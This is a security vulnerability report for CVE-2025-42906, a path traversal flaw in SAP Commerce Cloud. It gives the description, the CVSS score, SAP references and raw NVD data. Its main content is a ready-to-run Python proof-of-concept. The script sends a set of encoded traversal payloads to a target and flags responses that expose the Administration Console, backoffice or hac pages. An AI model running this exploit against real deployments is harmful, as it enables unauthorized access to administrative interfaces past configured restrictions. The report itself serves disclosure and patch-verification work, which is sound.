Security Vulnerability Report
CVE-2025-42906 CVSS 5.3 MEDIUM

CVE-2025-42906

Published: 2025-10-14 01:15:32
Last Modified: 2026-04-15 00:35:42

Description

SAP Commerce Cloud contains a path traversal vulnerability that may allow users to access web applications such as the Administration Console from addresses where the Administration Console is not explicitly deployed. This could potentially bypass configured access restrictions, resulting in a low impact on confidentiality, with no impact on the integrity or availability of the application.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

SAP Commerce Cloud: all versions without the October 2025 security patch installed

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-42906 - SAP Commerce Cloud Path Traversal PoC
# Vulnerability: Path Traversal allowing access to Administration Console
# from non-deployed addresses, bypassing access restrictions
import requests

TARGET_URL = "https://target-sap-commerce.example.com"


def exploit_path_traversal(base_url):
    """
    Attempt to access Administration Console via path traversal
    by manipulating URL paths to bypass routing restrictions.
    """
    # Various path traversal payloads to test
    payloads = [
        "/../admin",
        "/%2e%2e/admin",
        "/..%2fadmin",
        "/;/../admin",
        "/admin/../../../admin",
        "/../backoffice",
        "/%2e%2e/backoffice",
        "/hac/../hac",
        "/../hac",
    ]

    for payload in payloads:
        url = f"{base_url}{payload}"
        try:
            # Redirects are not followed so that the raw routing decision is observed
            response = requests.get(url, timeout=10, verify=False, allow_redirects=False)
            print(f"[*] Trying: {url}")
            print(f"    Status: {response.status_code}, Length: {len(response.text)}")

            # Check if response indicates admin console access
            if response.status_code == 200 and len(response.text) > 0:
                if any(keyword in response.text.lower()
                       for keyword in ["admin", "console", "backoffice", "hac", "login"]):
                    print(f"[+] Potential access found: {url}")
                    return response
        except requests.exceptions.RequestException as e:
            print(f"[-] Error: {e}")

    return None


if __name__ == "__main__":
    print("=== CVE-2025-42906 Path Traversal PoC ===")
    result = exploit_path_traversal(TARGET_URL)
    if result:
        print("[+] Exploit completed - Admin console may be accessible")
    else:
        print("[-] No accessible admin console found")
```

References

https://me.sap.com/notes/3634724
https://url.sap/sapsecuritypatchday

Raw JSON Data

```json
{"cve": {"id": "CVE-2025-42906", "sourceIdentifier": "[email protected]", "published": "2025-10-14T01:15:32.317", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "SAP Commerce Cloud contains a path traversal vulnerability that may allow users to access web applications such as the Administration Console from addresses where the Administration Console is not explicitly deployed. This could potentially bypass configured access restrictions, resulting in a low impact on confidentiality, with no impact on the integrity or availability of the application."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://me.sap.com/notes/3634724", "source": "[email protected]"}, {"url": "https://url.sap/sapsecuritypatchday", "source": "[email protected]"}]}}
```